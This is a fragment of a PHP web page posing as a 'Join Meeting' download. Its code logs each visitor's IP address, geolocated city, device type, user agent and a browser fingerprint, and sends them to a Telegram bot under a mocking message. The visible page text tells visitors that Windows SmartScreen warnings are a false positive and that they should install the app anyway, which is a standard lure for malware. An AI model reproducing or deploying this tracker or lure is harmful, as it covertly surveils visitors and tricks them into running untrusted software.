TELEGRAM_CHAT_ID, 'text' => $message, ]; $options = [ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), ], ]; $context = stream_context_create($options); file_get_contents($url, false, $context); } // Get visitor's IP address $ip_address = $_SERVER['REMOTE_ADDR']; // Get location using IP geolocation API (ip-api.com) $geo_url = "http://ip-api.com/json/{$ip_address}"; $geo_data = json_decode(file_get_contents($geo_url), true); if ($geo_data && $geo_data['status'] == 'success') { $location = "{$geo_data['city']}, {$geo_data['regionName']}, {$geo_data['country']}"; } else { $location = "Unknown location"; } // Get device type and browser information from User-Agent $user_agent = $_SERVER['HTTP_USER_AGENT']; // Basic device type detection if (strpos($user_agent, 'Mobile') !== false) { $device_type = 'Mobile'; } elseif (strpos($user_agent, 'Tablet') !== false) { $device_type = 'Tablet'; } else { $device_type = 'Desktop'; } // Generate a basic browser fingerprint $fingerprint = md5($ip_address . $user_agent . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . $_SERVER['HTTP_ACCEPT']); // Prepare the message $message = "See the werey location lol :)!!\n" . "IP: {$ip_address}\n" . "Location: {$location}\n" . "Device Type: {$device_type}\n" . "User Agent: {$user_agent}\n" . "Fingerprint: {$fingerprint}"; // Send the message to Telegram sendTelegramMessage($message); ?> Join Meeting
Downloading... Downloading...

Windows may show a security alert — this is normal

Our app is new and not yet recognized by Microsoft SmartScreen. This is a false positive. To install safely, follow these steps: